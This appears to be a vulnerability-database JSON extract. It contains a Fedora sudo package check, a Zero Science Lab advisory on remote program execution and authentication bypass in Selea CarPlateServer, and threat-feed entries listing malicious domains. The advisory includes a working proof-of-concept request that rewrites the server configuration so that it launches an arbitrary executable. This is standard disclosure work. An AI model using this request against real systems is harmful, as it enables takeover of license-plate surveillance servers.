audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"sudo-1.9.5p1-1.fc32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "zeroscience": [{"lastseen": "2021-01-22T01:27:27", "description": "Title: Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution \nAdvisory ID: [ZSL-2021-5622](<ZSL-2021-5622.php>) \nType: Local/Remote \nImpact: System Access, Cross-Site Scripting, Security Bypass, DoS \nRisk: (4/5) \nRelease Date: 21.01.2021 \n\n\n##### Summary\n\nOur CPS (Car Plate Server) software is an advanced solution that can be installed on computers and 
servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences. \n\n##### Description\n\nThe server suffers from an arbitrary win32/64 binary executable execution when setting the NO_LIST_EXE_PATH variable to a program of choice. The command will be executed if proper trigger criteria is met. It can be exploited via CSRF or by navigating to /cps/ endpoint from the camera IP and bypass authentication gaining the ability to modify the running configuration including changing the password of admin and other users. \n\n##### Vendor\n\nSelea s.r.l. - <https://www.selea.com>\n\n##### Affected Version\n\n4.0.1.6(210120) \n4.013(201105) \n3.100(200225) \n3.005(191206) \n3.005(191112) \n\n##### Tested On\n\nMicrosoft Windows 10 Enterprise \nSeleaCPSHttpServer/1.1 \n\n##### Vendor Status\n\n[07.11.2020] Vulnerability discovered. \n[09.11.2020] Vendor contacted. \n[09.11.2020] Vendor responds asking for explanation. \n[09.11.2020] Asked vendor for security personnel and explained about security submissions and risk/impact. \n[10.11.2020] Vendor responds asking for details. \n[11.11.2020] Sent details to the vendor (high-level, asked for PGP). \n[14.11.2020] Asked vendor for status update. 
\n[18.11.2020] Vendor responds: We already reviewed and fixed most of the vulnerabilities you described in newer version of both camera firmware and the CarPlateServer software. \n[19.11.2020] Replied to the vendor. \n[20.11.2020] Vendor will get back to us. \n[06.12.2020] Asked vendor for status update. \n[09.12.2020] Vendor in final test phase for new releases. Estimated release date: End of year. \n[09.12.2020] Replied to the vendor. \n[17.01.2021] Asked vendor for status update. \n[20.01.2021] No response from the vendor. \n[21.01.2021] Public security advisory released. \n\n##### PoC\n\n[selea_csp_rce.txt](<../../codes/selea_csp_rce.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\nN/A \n\n##### Changelog\n\n[21.01.2021] - Initial release \n\n##### Contact\n\nZero Science Lab \n \nWeb: <https://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 2, "published": "2021-01-21T00:00:00", "title": "Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-21T00:00:00", "id": "ZSL-2021-5622", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php", "sourceData": "\r\nSelea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution\r\n\r\n\r\nVendor: Selea s.r.l.\r\nProduct web page: https://www.selea.com\r\nAffected version: 4.0.1.6(210120)\r\n 4.013(201105)\r\n 3.100(200225)\r\n 3.005(191206)\r\n 3.005(191112)\r\n\r\nSummary: Our CPS (Car Plate Server) software is an advanced solution that can\r\nbe installed on computers and servers and used as an operations centre. It can\r\ncreate sophisticated traffic control and road safety systems connecting to\r\nstationary, mobile or vehicle-installed ANPR systems. 
CPS allows to send alert\r\nnotifications directly to tablets or smartphones, it can receive and transfer\r\ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution\r\nthat offers full integration with main video surveillance software. Our CPS\r\nsoftware connects to the national operations centre and provides law enforcement\r\nauthorities with necessary tools to issue alerts. CPS is designed to guarantee\r\ncooperation among different law enforcement agencies. It allows to create a\r\nmulti-user environment that manages different hierarchy levels and the related\r\ndivision of competences.\r\n\r\nDesc: The server suffers from an arbitrary win32/64 binary executable execution\r\nwhen setting the NO_LIST_EXE_PATH variable to a program of choice. The command\r\nwill be executed if proper trigger criteria is met. It can be exploited via CSRF\r\nor by navigating to /cps/ endpoint from the camera IP and bypass authentication\r\ngaining the ability to modify the running configuration including changing the\r\npassword of admin and other users.\r\n\r\nTested on: Microsoft Windows 10 Enterprise\r\n SeleaCPSHttpServer/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5622\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php\r\n\r\n\r\n08.11.2020\r\n\r\n--\r\n\r\n\r\nPOST /config_request?ACTION=WRITE HTTP/1.1\r\nHost: localhost:8080\r\nConnection: keep-alive\r\nContent-Length: 6309\r\nAuthorization: Basic ZmFrZTpmYWtl\r\nAccept: application/json, text/plain, */*\r\nLoginMode: angular\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75\r\nAuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a\r\ncontent-type: application/json\r\nOrigin: http://localhost:8080\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: 
http://localhost:8080/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n\r\n{\r\n \"ACTIONS\": {\r\n \"ANIA_LIST_DAYS_NUM\": \"15\",\r\n \"ANIA_LIST_PWD\": \"\",\r\n \"ANIA_LIST_USER\": \"{B64valuehereommited}\",\r\n \"BLACK_LIST_COUNTRY\": \"\",\r\n \"EXACT_MATCH\": \"false\",\r\n \"FUZZY_MATCH\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_DAYS_NUM\": \"15\",\r\n \"MINISTEROTRASPORTI_LIST_ENABLE_CHECK\": \"0,1\",\r\n \"MINISTEROTRASPORTI_LIST_GET_OWNERS\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_PWD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USER\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USE_VPN\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_PASSWORD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_USERNAME\": \"\",\r\n \"MINISTERO_LIST_DAYS_NUM\": \"24\",\r\n \"MINISTERO_LIST_PWD\": \"\",\r\n \"MINISTERO_LIST_USER\": \"\",\r\n \"NO_LIST_ENABLED\": \"true\",\r\n \"NO_LIST_ENABLE_EXE\": \"true\",\r\n \"NO_LIST_EXE_PATH\": \"C:/windows/system32/calc.exe\",\r\n \"NO_LIST_HTTP\": \"http://localhost:8080/$TRIGGER_EXE_VAR\",\r\n \"NO_LIST_HTTP_ENABLED\": \"false\",\r\n \"NO_LIST_SEND_TCP_ALARM\": \"\",\r\n \"PERMISSIVE_MATCH\": \"true\",\r\n \"WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO\": \"\"\r\n },\r\n \"CAMERAINFO\": {\r\n \"BA__________\": {\r\n \"APPROACHING\": \"\",\r\n \"CustomCameraId\": \"\",\r\n \"CustomGateId\": \"\",\r\n \"DetectDesc\": \"ZSL\",\r\n \"DetectId\": \"\",\r\n \"Direction\": \"\",\r\n \"GPSLocation\": \"\",\r\n \"GateDesc\": \"3\",\r\n \"GateId\": \"\",\r\n \"LEAVING\": \"\",\r\n \"ZoneName\": \"\",\r\n \"setname\": \"false\",\r\n \"skip\": \"false\"\r\n }\r\n },\r\n \"CONTEXT\": {\r\n \"BA__________\": {\r\n \"URL\": [\r\n \"https://www.zeroscience.mk\"\r\n ]\r\n }\r\n },\r\n \"DBMS\": {\r\n \"DB_NAME\": \"\",\r\n \"DB_PASSWORD\": \"\",\r\n 
\"DB_SERVER\": \"\",\r\n \"DB_TYPE\": \"sqlite\",\r\n \"DB_USERNAME\": \"\",\r\n \"ENCRYPT_DB\": \"false\",\r\n \"SQLITE_MAX_MB_RAM_CACHE\": \"-1\"\r\n },\r\n \"EMAIL\": {\r\n \"DEST\": \"\",\r\n \"FROM_EMAIL\": \"\",\r\n \"FROM_NAME\": \"\",\r\n \"LOG_USER_SEARCH\": \"false\",\r\n \"MIN_EMAIL_TIME\": \"5\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"25\",\r\n \"SEND_EMAIL_ON_TAMPER\": \"false\",\r\n \"SERVER\": \"\",\r\n \"SSL\": \"false\",\r\n \"USERNAME\": \"\",\r\n \"XOAUTH2\": \"false\"\r\n },\r\n \"EMAIL-XOAUTH2\": {\r\n \"refresh_token\": \"\"\r\n },\r\n \"EZ_CLIENTS\": {\r\n \"PASSWORD\": \"\",\r\n \"SLAVES\": \"\",\r\n \"USERNAME\": \"\",\r\n \"USE_CNTLM\": \"false\",\r\n \"WANT_CTX\": \"false\"\r\n },\r\n \"EZ_CLIENT_SCNTT\": {\r\n \"CTX\": \"true\",\r\n \"HOST\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"443\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"FTPSYNC\": {\r\n \"DELETE_OLD_SYNC_DAYS\": \"7\",\r\n \"JSON_CONFIG\": \"eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==\",\r\n \"SAVE_FTP_SEND_ERRORS\": \"true\"\r\n },\r\n \"GLOBAL_HTTP_PROXY\": {\r\n \"CNTLM_ENABLED\": \"false\",\r\n \"EZ_ADDRESS\": \"cps.selea.com\",\r\n \"EZ_PORT\": \"8999\",\r\n \"HOST\": \"\",\r\n \"NON_PROXY_HOST\": \"localhost|^(10|127|169\\\\.254|172\\\\.1[6-9]|172\\\\.2[0-9]|172\\\\.3[0-1]|192\\\\.168)\\\\..+\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"PROXY_ENABLED\": \"true\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"HTTPS\": {\r\n \"CERTIFICATE\": \"\",\r\n \"ENABLE_HTTP2\": \"true\",\r\n \"GET_CERTIFICATE_FROM_SELEA\": \"false\",\r\n \"PRIVATE_KEY\": \"\",\r\n \"ROOT_CERTIFICATE\": \"\"\r\n },\r\n \"MASTER_CPS\": {\r\n \"ENABLED\": \"true\",\r\n \"MASTERS\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"PROXY_TCP\": {\r\n \"ENABLED\": \"false\",\r\n \"USE_HTTP_PROXY\": \"false\"\r\n },\r\n \"REMOTE_LIST\": {\r\n \"ADDRESS\": \"\",\r\n \"ENABLED\": \"false\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"REPORT\": {\r\n 
\"STATS_AGGREGATE\": \"true\",\r\n \"STATS_ENABLED\": \"false\",\r\n \"STATS_FREQ\": \"MONTH\",\r\n \"STATS_PATH\": \"\",\r\n \"STATS_SELECTED\": \"\",\r\n \"STATS_WEEK_DAY\": \"Mon\"\r\n },\r\n \"SCNTT\": {\r\n \"LIST_A1_DAYS_LIMIT\": \"0\",\r\n \"SCNTT_PASSWORD\": \"\",\r\n \"SCNTT_PRIV_KEY_FILENAME\": \"\",\r\n \"SCNTT_PUB_CERT\": \"\",\r\n \"SCNTT_SYSTEM_DESC\": \"\",\r\n \"SCNTT_SYSTEM_ID\": \"\",\r\n \"SCNTT_USERNAME\": \"\"\r\n },\r\n \"SETTINGS\": {\r\n \"ALLOW_FLASH_NOTIFICATIONS\": \"true\",\r\n \"AUTO_UPDATE\": \"true\",\r\n \"BACKUP_AT_SPECIFIC_HOUR\": \"-1\",\r\n \"BACKUP_DB_PATH\": \"\",\r\n \"BACKUP_EVERY_HOURS\": \"0\",\r\n \"CARPLATE_DETAILS_ENABLED\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES_DAYS\": \"7\",\r\n \"CHECK_FILENAME_SYNTAX\": \"true\",\r\n \"DB_DELETE_DAYS\": \"90\",\r\n \"DB_DELETE_ENABLE\": \"false\",\r\n \"DB_DELETE_LOG_DAYS\": \"7\",\r\n \"DB_DELETE_OCR_FILE\": \"90\",\r\n \"DB_STATS_DELETE_DAYS\": \"90\",\r\n \"DISABLE_WHITELIST_REMOTE_DB_CHECK\": \"false\",\r\n \"ENCRYPT_IMAGES\": \"false\",\r\n \"FREE_DISK_LIMIT\": \"1000\",\r\n \"FRIENDLY_NAME\": \"test\",\r\n \"FTP_CUSTOM_PORT_RANGE\": \"false\",\r\n \"FTP_DOWNLOAD_DISABLED\": \"true\",\r\n \"FTP_ENABLED\": \"true\",\r\n \"FTP_EXTERN_IP\": \"\",\r\n \"FTP_EXTERN_IP_AUTO\": \"false\",\r\n \"FTP_LIST_DIR_DISABLED\": \"true\",\r\n \"FTP_MAX_PORT\": \"0\",\r\n \"FTP_MIN_PORT\": \"0\",\r\n \"FTP_PORT\": \"21\",\r\n \"FTP_USERS\": \"\",\r\n \"FTP_USE_FTPS\": \"true\",\r\n \"HTTP2_PORT\": \"8081\",\r\n \"HTTP_PASSWORD\": \"CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU\",\r\n \"HTTP_PORT\": \"8080\",\r\n \"HTTP_USERNAME\": \"admin\",\r\n \"IGNORE_CONTEXT_FOR_UNREADFAKE\": \"false\",\r\n \"IGNORE_IF_NOT_SYNTAX_MATCH\": \"false\",\r\n \"MILESTONE_CONNECTIONS\": \"5\",\r\n \"MILESTONE_ENABLED\": \"true\",\r\n \"MILESTONE_ENABLE_ACTIVE_CONNECTION\": \"false\",\r\n \"MILESTONE_PORT\": \"5666\",\r\n \"MILESTON_REMOTE_IP\": \"\",\r\n 
\"MILESTON_REMOTE_PORT\": \"8080\",\r\n \"MIN_LOG_LEVEL\": \"0\",\r\n \"PERIODIC_BACKUP_CONFIG\": \"0\",\r\n \"REMOVE_BLACK_LIST_ON_EXPIRE\": \"true\",\r\n \"REMOVE_NON_ALARM_CARPLATE\": \"false\",\r\n \"REMOVE_WHITE_LIST_ON_EXPIRE\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS\": \"7\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION\": \"false\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME\": \"600\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ\": \"false\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME\": \"12\",\r\n \"SERVER_NTP_ON\": \"false\",\r\n \"SERVER_NTP_PORT\": \"123\",\r\n \"USE_HTTPS\": \"false\"\r\n },\r\n \"VPNC\": {\r\n \"VPN_NET_NAME\": \"\"\r\n },\r\n \"TCP_TEMPLATES\": []\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/selea_csp_rce.txt"}], "rst": [{"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **867383-dot-n-e-w-me-ss-age-po-rt-al[.]wl.r.appspot.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **9**.\n First seen: 2020-10-01T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 146[.]112.61.108\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-10-01T00:00:00", "id": "RST:324C5FA3-022A-3022-8AF9-57F74F552633", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. 
IOC: 867383-dot-n-e-w-me-ss-age-po-rt-al.wl.r.appspot.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **88[.]wjx88.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **9**.\n First seen: 2020-08-04T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 47[.]91.169.15 and CNAME records: overdue.aliyun.com.\nWhois:\n Created: 2017-08-16 11:20:51, \n Registrar: Alibaba Cloud Computing Beijing Co Ltd, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-04T00:00:00", "id": "RST:98A1C8A3-0320-3397-844B-8B12D9E9CB80", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 88.wjx88.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **9-23[.]dedicado.com.uy** in [RST Threat Feed](https://rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 201[.]221.23.9\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:1E3C5A0B-7D02-389F-BC8F-37E83FB083D2", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. 
IOC: 9-23.dedicado.com.uy", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **9-187-231-201[.]fibertel.com.ar** in [RST Threat Feed](https://rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 201[.]231.187.9\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:06107CE8-D814-39EE-AAFF-891775733A8B", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 9-187-231-201.fibertel.com.ar", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **9[.]cclastnews.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 104[.]18.61.173,104.18.60.173,172.67.181.112\nWhois:\n Created: 2019-04-28 16:37:37, \n Registrar: REGISTRAR OF DOMAIN NAMES REGRU LLC, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:0FCAF7D8-66B4-3F84-8D65-A4114564212F", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 9.cclastnews.com", "type": "rst", "cvss": {}}]}